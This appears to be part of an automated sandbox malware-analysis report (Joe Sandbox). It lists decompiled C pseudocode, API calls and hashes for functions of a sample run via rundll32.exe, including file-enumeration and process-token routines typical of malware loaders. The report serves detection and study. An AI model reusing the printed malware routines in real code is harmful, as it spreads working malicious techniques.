                                          • Instruction ID: 9471a5b3aef48b89ea57649f97dfdece0a9b9375bad93a10d55b5735fc5c8338
                                          • Opcode Fuzzy Hash: 3fd8c133c0e851fededcac71da1685cff8d349504232080afbdd71bd9968f2a2
                                          • Instruction Fuzzy Hash: 60F0B7706142419BE754AF68EB48B1977E8EF34785B04462CF5C2F7290E62CEC40DE29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040878AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040878AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x408d26c; // 0x3bc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x408d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x408d26c; // 0x3bc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x408d238; // 0x4890000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x040878ad
                                          0x040878b4
                                          0x040878fe
                                          0x04087900
                                          0x04087900
                                          0x040878b8
                                          0x040878be
                                          0x040878c3
                                          0x040878c7
                                          0x040878cd
                                          0x040878d4
                                          0x00000000
                                          0x00000000
                                          0x040878d6
                                          0x040878db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x040878db
                                          0x040878dd
                                          0x040878e5
                                          0x040878e8
                                          0x040878e8
                                          0x040878ee
                                          0x040878f5
                                          0x040878f8
                                          0x040878f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003BC,00000001,04086F2D), ref: 040878B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 040878C7
                                          • CloseHandle.KERNEL32(000003BC), ref: 040878E8
                                          • HeapDestroy.KERNEL32(04890000), ref: 040878F8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 206168054a9a0b2017887b38d692f2893276c585a0a11b3f5b3a3b79a5fc0c68
                                          • Instruction ID: 1c35c50f9d70165ceaacb57c764266358ba30dd79cb2697683d948e3663d00f4
                                          • Opcode Fuzzy Hash: 206168054a9a0b2017887b38d692f2893276c585a0a11b3f5b3a3b79a5fc0c68
                                          • Instruction Fuzzy Hash: 74F0F871A49315D7F6606E75AF48A067BE9EF157A17240639AC80F72D4CB2CEC00DA70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04089B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x408d324; // 0x4c895b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x408d324; // 0x4c895b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x408d324; // 0x4c895b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x408e845) {
					HeapFree( *0x408d238, 0, _t10);
					_t7 =  *0x408d324; // 0x4c895b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04089b10
                                          0x04089b19
                                          0x04089b29
                                          0x04089b29
                                          0x04089b2e
                                          0x04089b33
                                          0x00000000
                                          0x00000000
                                          0x04089b23
                                          0x04089b23
                                          0x04089b35
                                          0x04089b3a
                                          0x04089b3e
                                          0x04089b51
                                          0x04089b57
                                          0x04089b57
                                          0x04089b60
                                          0x04089b62
                                          0x04089b66
                                          0x04089b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(04C89570), ref: 04089B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04089B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04084A8B,?,?,?,4D283A53,?,?), ref: 04089B51
                                          • RtlLeaveCriticalSection.NTDLL(04C89570), ref: 04089B66
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 53d48c0707783df20f0a5a93801afd1221bd37e140635583e3cb56b89a8997af
                                          • Instruction ID: 1c889ab16b1a6fddab1c850908e272e9442b56dee547667fce1ec490c8885719
                                          • Opcode Fuzzy Hash: 53d48c0707783df20f0a5a93801afd1221bd37e140635583e3cb56b89a8997af
                                          • Instruction Fuzzy Hash: 8FF062B46042019BEB58AF64EB59E2937F5EF58741B05412CE986FB390C62CAC40DE25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081EC4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E04081EC4(void* __eax, char _a4) {

				 *0x408d2b0 =  *0x408d2b0 & 0x00000000;
				_push(0);
				_push("pSs");
				_push(1);
				_t1 =  &_a4; // 0x4d283a53
				_push( *_t1);
				 *0x408d2a8 = 0xc;
				L040869E2();
				return __eax;
			}



                                          0x04081ec4
                                          0x04081ecb
                                          0x04081ecd
                                          0x04081ed2
                                          0x04081ed4
                                          0x04081ed4
                                          0x04081ed8
                                          0x04081ee2
                                          0x04081ee7

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(S:(M,00000001,pSs,00000000), ref: 04081EE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID: S:(M$pSs
                                          • API String ID: 3907675253-3661608155
                                          • Opcode ID: dc0507ef530ede86f1c085ee78ec76c0d36b3b5b8bcc41a346251f28f86eb255
                                          • Instruction ID: 8b85942684c0dadd879d815e722394ef5a19081ea168812fbafb71237ce33c73
                                          • Opcode Fuzzy Hash: dc0507ef530ede86f1c085ee78ec76c0d36b3b5b8bcc41a346251f28f86eb255
                                          • Instruction Fuzzy Hash: 20C00274144350AAF621BE009A46F567655EB60729F20061DA180341D083FAA4549A15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04086B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04086B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E040858BE(_t2);
				if(_t34 != 0) {
					_t30 = E040858BE(_t28);
					if(_t30 == 0) {
						E0408147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0408A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0408A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x04086b6e
                                          0x04086b78
                                          0x04086b7a
                                          0x04086b80
                                          0x04086b80
                                          0x04086b89
                                          0x04086b8d
                                          0x04086b99
                                          0x04086b9d
                                          0x04086c11
                                          0x04086b9f
                                          0x04086b9f
                                          0x04086ba3
                                          0x04086ba8
                                          0x04086bad
                                          0x04086bc7
                                          0x04086bb6
                                          0x04086bb6
                                          0x04086bba
                                          0x04086bbd
                                          0x04086bc2
                                          0x04086bc2
                                          0x04086bcc
                                          0x04086bf4
                                          0x04086bfa
                                          0x04086bfd
                                          0x04086bce
                                          0x04086bd0
                                          0x04086bd8
                                          0x04086be3
                                          0x04086be8
                                          0x04086be8
                                          0x04086c04
                                          0x04086c0b
                                          0x04086c0c
                                          0x04086c0c
                                          0x04086b9d
                                          0x04086c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000), ref: 04086B7A
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                            • Part of subcall function 0408A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04086BA8,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102), ref: 0408A8E0
                                            • Part of subcall function 0408A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102,040866AF,?), ref: 04086BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04086BF4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: d1e48e466ad11fcc0b944588ed96b9624fd5c48b5666d4f6c7d971bd6d9001b1
                                          • Instruction ID: cb2d16e6ca5be3a7cc2a61a146ae8bca716b9791b96644c3897ea867f1ceae3a
                                          • Opcode Fuzzy Hash: d1e48e466ad11fcc0b944588ed96b9624fd5c48b5666d4f6c7d971bd6d9001b1
                                          • Instruction Fuzzy Hash: EF21F371504249FFDB126FB4CA44AAE7FF8DF06288B054468E984BB201E736E9408BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04085FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04085FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E040858BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x04085fe0
                                          0x04085fe4
                                          0x04085fee
                                          0x04085ff3
                                          0x04085ff8
                                          0x04085ffa
                                          0x04086002
                                          0x04086007
                                          0x04086015
                                          0x0408601a
                                          0x04086024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,04C8937C,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04085FDB
                                          • lstrlenW.KERNEL32(0408694E,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04085FE2
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0408694E,004F0053,04C8937C,?,?,?,?,?,?,04089C10), ref: 04086002
                                          • memcpy.NTDLL(751469A0,0408694E,00000002,00000000,004F0053,751469A0,?,?,0408694E,004F0053,04C8937C), ref: 04086015
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: bee36b381d0d4f0f75fee3bd0cacc72acffdf6b545e06748bba0534e5846c0de
                                          • Instruction ID: ec61695dd999fea67bd163532b12ee7c4b790cc337aeb28af7d58ad242f927c9
                                          • Opcode Fuzzy Hash: bee36b381d0d4f0f75fee3bd0cacc72acffdf6b545e06748bba0534e5846c0de
                                          • Instruction Fuzzy Hash: 5FF03C72900119BB9B11EFA8CD85CDF7BACEF092987154466A944E7201E635EA109BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089DEF, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04085335,616D692F,00000000), ref: 04089DFB
                                          • lstrlen.KERNEL32(?), ref: 04089E03
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04089E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04089E25
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 387bf997c65f0e792ce936fd43ab7bb66f0bf6df336830d8e99cbea4548cac03
                                          • Instruction ID: 29f806928a4d9ef2a1a3271e3ec79e9f11f8fa08973e9420be83552eada48453
                                          • Opcode Fuzzy Hash: 387bf997c65f0e792ce936fd43ab7bb66f0bf6df336830d8e99cbea4548cac03
                                          • Instruction Fuzzy Hash: ABE01233809621AB97127FE4AD08C9FBFB9FF89260705492AF690A7114C739D8158FE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rundll32.exe PID: 2624 Parent PID: 2880 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 047B32BA, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E047B32BA(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x47bd2a0; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x47bd238, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x47bd2a0; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x47bd238, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x47bd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x47bd2a0; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x47bd2a4; // 0x24fa5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x47be7e8; // 0x73797325
				_t83 = E047B77E6(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x47bd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x47bd2a4; // 0x24fa5a8
				_t16 = _t93 + 0x47be809; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                          0x047b32c3
                                          0x047b32c9
                                          0x047b32cb
                                          0x047b32e5
                                          0x047b32e7
                                          0x047b32ec
                                          0x047b3561
                                          0x047b3568
                                          0x047b3568
                                          0x047b32f2
                                          0x047b3307
                                          0x047b3309
                                          0x047b330b
                                          0x047b3310
                                          0x047b3551
                                          0x047b355b
                                          0x00000000
                                          0x047b355b
                                          0x047b3316
                                          0x047b3321
                                          0x047b3326
                                          0x047b332b
                                          0x047b332e
                                          0x047b3335
                                          0x047b333a
                                          0x047b333f
                                          0x047b3541
                                          0x047b354b
                                          0x00000000
                                          0x047b354b
                                          0x047b3355
                                          0x047b3359
                                          0x047b335c
                                          0x047b335f
                                          0x047b3365
                                          0x047b336a
                                          0x047b3373
                                          0x047b3379
                                          0x047b3383
                                          0x047b338a
                                          0x047b338a
                                          0x047b339c
                                          0x047b33a7
                                          0x047b33b5
                                          0x047b33ba
                                          0x047b33bf
                                          0x047b33c2
                                          0x047b33c7
                                          0x047b33d1
                                          0x047b33d4
                                          0x047b33d7
                                          0x047b33ed
                                          0x047b33ef
                                          0x047b33f4
                                          0x047b353f
                                          0x00000000
                                          0x047b353f
                                          0x047b340b
                                          0x047b345c
                                          0x047b341f
                                          0x047b3427
                                          0x047b342c
                                          0x047b343a
                                          0x047b3443
                                          0x047b344c
                                          0x047b344c
                                          0x047b345a
                                          0x047b345a
                                          0x047b3460
                                          0x047b3464
                                          0x047b3464
                                          0x047b346a
                                          0x00000000
                                          0x00000000
                                          0x047b346c
                                          0x047b3472
                                          0x047b3519
                                          0x047b351c
                                          0x047b3529
                                          0x047b3529
                                          0x047b352d
                                          0x00000000
                                          0x00000000
                                          0x047b3522
                                          0x047b3526
                                          0x047b3526
                                          0x047b3528
                                          0x047b3528
                                          0x047b3532
                                          0x047b3539
                                          0x047b353b
                                          0x00000000
                                          0x047b353b
                                          0x047b3478
                                          0x047b347a
                                          0x047b347a
                                          0x047b348d
                                          0x047b3493
                                          0x047b349e
                                          0x047b34a0
                                          0x047b34a4
                                          0x047b34a6
                                          0x047b34a6
                                          0x047b34ab
                                          0x047b34ad
                                          0x047b34ad
                                          0x047b34ab
                                          0x047b34b2
                                          0x047b34b6
                                          0x047b34b6
                                          0x047b34c6
                                          0x047b34cb
                                          0x047b34ce
                                          0x047b34ce
                                          0x047b34d1
                                          0x047b34db
                                          0x047b34e3
                                          0x047b34e8
                                          0x047b34f6
                                          0x047b34f6
                                          0x047b350a
                                          0x047b350e
                                          0x047b350e

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 047B32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 047B3307
                                          • memset.NTDLL ref: 047B3321
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,047B333A,73797325), ref: 047B77F7
                                            • Part of subcall function 047B77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047B7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 047B335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 047B3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 047B338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 047B3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 047B33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B340B
                                          • FindNextFileA.KERNELBASE(047B207E,?), ref: 047B341F
                                          • FindClose.KERNEL32(047B207E), ref: 047B342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 047B348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 047B34C6
                                          • FindNextFileA.KERNELBASE(047B207E,?), ref: 047B34DB
                                          • FindClose.KERNEL32(047B207E), ref: 047B34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 047B34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 047B3504
                                          • FindClose.KERNEL32(047B207E), ref: 047B3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 047B354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B355B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: e9fe2dd770be5ebb2b7b1618efc6777356249a054c56e102df86131edcfd8ac9
                                          • Instruction ID: f250e53aa296777e6c0812538a0cfdfea336f5c8ebb5b6ddee669df9899b265e
                                          • Opcode Fuzzy Hash: e9fe2dd770be5ebb2b7b1618efc6777356249a054c56e102df86131edcfd8ac9
                                          • Instruction Fuzzy Hash: 47813B71D00119AFDB119FA5DC88FEEBBB9EF44300F14846AE945E6250E774AA84CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 047B71B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E047B71B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E047B58BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E047B147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x047b71c6
                                          0x047b71c7
                                          0x047b71c8
                                          0x047b71c9
                                          0x047b71ca
                                          0x047b71ce
                                          0x047b71d5
                                          0x047b71e4
                                          0x047b71e7
                                          0x047b71ea
                                          0x047b71f1
                                          0x047b71f4
                                          0x047b71f7
                                          0x047b71fa
